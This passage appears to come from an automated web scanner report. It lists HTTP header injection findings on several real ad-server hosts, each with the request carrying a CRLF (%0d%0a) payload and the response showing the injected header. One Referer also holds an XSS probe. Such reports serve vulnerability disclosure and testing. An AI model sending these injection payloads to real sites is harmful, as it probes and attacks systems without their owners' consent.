User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/d9fc1
6b3dc4ec589
;src=1948992;type=wsjre849;cat=publi675;ord=5535785951651.633:
Date: Thu, 16 Jun 2011 11:23:29 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.specificmedia.com/B4970757.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4ff25%0d%0ae23aa2286a8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4ff25%0d%0ae23aa2286a8/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110616104458
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4ff25
e23aa2286a8
/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http: //clk.specificclick.net/click/v=5;m=2;l=4749;c=124110;b=740428;ts=1308235498;dct=;ord=1308235498
Date: Thu, 16 Jun 2011 14:46:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.RealMedia/B5598690.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3738f%0d%0a1fc365d485d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3738f%0d%0a1fc365d485d/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3738f
1fc365d485d
/N5823.RealMedia/B5598690.4;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62
Date: Thu, 16 Jun 2011 15:53:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.RealMedia/B5598690.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d630%0d%0a3989d204e3c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d630%0d%0a3989d204e3c/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9d630
3989d204e3c
/N5823.RealMedia/B5598690.8;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62
Date: Thu, 16 Jun 2011 16:03:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 587d7%0d%0a016d0289655 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /587d7%0d%0a016d0289655/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/587d7
016d0289655
/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:23:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/forgotpassword

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c02a%0d%0a9333c1f4750 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c02a%0d%0a9333c1f4750/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c02a
9333c1f4750
/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076;:
Date: Thu, 16 Jun 2011 11:25:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/front_nonsub

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57946%0d%0a3ad065f0f29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57946%0d%0a3ad065f0f29/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57946
3ad065f0f29
/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:23:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N1057.280341.AOL.COMADVERTISING/B5447531.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49a4e%0d%0afea689c0339 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49a4e%0d%0afea689c0339/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034%5E1024394%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64?trg=;ord=6354081067? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248841013&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49a4e
fea689c0339
/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64
Date: Thu, 16 Jun 2011 18:28:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4190.advertising.com/B5416523.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1215f%0d%0a1faea7da71e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1215f%0d%0a1faea7da71e/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034%5E1008685%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64?trg=;ord=1828847536? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308250703177&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1215f
1faea7da71e
/N4190.advertising.com/B5416523.2;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034^1008685^1183^0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64
Date: Thu, 16 Jun 2011 18:59:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6046.134363.2043285697521/B5118749.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91c76%0d%0a816a901a517 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91c76%0d%0a816a901a517/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033%5E993430%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64?trg=;ord=4721737206? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251334943&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91c76
816a901a517
/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033^993430^1183^0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64
Date: Thu, 16 Jun 2011 19:10:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/front_nonsub

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82c25%0d%0ad0abc40537d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /82c25%0d%0ad0abc40537d/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/82c25
d0abc40537d
/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:24:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9ae29%0d%0a722f0480e14 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9ae29%0d%0a722f0480e14/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=582942091860? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9ae29
722f0480e14
/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=582942091860:
Date: Thu, 16 Jun 2011 11:27:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/news_us

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4eabc%0d%0ab898c22b5c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4eabc%0d%0ab898c22b5c2/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=112909254851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4eabc
b898c22b5c2
/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=112909254851:
Date: Thu, 16 Jun 2011 11:27:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/nbcu.cnbc/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a34c%0d%0a672eba945fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a34c%0d%0a672eba945fc/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=808273578585? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a34c
672eba945fc
/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=808273578585:
Date: Fri, 17 Jun 2011 10:13:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ads.cleveland.com/RealMedia/ads/adstream.cap [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.cleveland.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload dcfdb%0d%0a855b65252b8 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=dcfdb%0d%0a855b65252b8&va=0&e=1s HTTP/1.1
Host: ads.cleveland.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:08 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: dcfdb
855b65252b8
=0; expires=Thu, 16-Jun-11 13:09:09 GMT; path=/; domain=.cleveland.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:08 GMT;path=/;httponly


2.16. http://ads.cleveland.com/RealMedia/ads/adstream.cap [va parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.cleveland.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79ef9%0d%0a1c69c390e7f was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=79ef9%0d%0a1c69c390e7f&e=1s HTTP/1.1
Host: ads.cleveland.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:34 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=79ef9
1c69c390e7f
; expires=Thu, 16-Jun-11 13:09:35 GMT; path=/; domain=.cleveland.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:34 GMT;path=/;httponly


2.17. http://ads.nj.com/RealMedia/ads/adstream.cap [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.nj.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 6bee4%0d%0aa3daea546bc was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=6bee4%0d%0aa3daea546bc&va=0&e=1s HTTP/1.1
Host: ads.nj.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:33 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 6bee4
a3daea546bc
=0; expires=Thu, 16-Jun-11 13:09:34 GMT; path=/; domain=.nj.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:33 GMT;path=/;httponly


2.18. http://ads.nj.com/RealMedia/ads/adstream.cap [va parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.nj.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

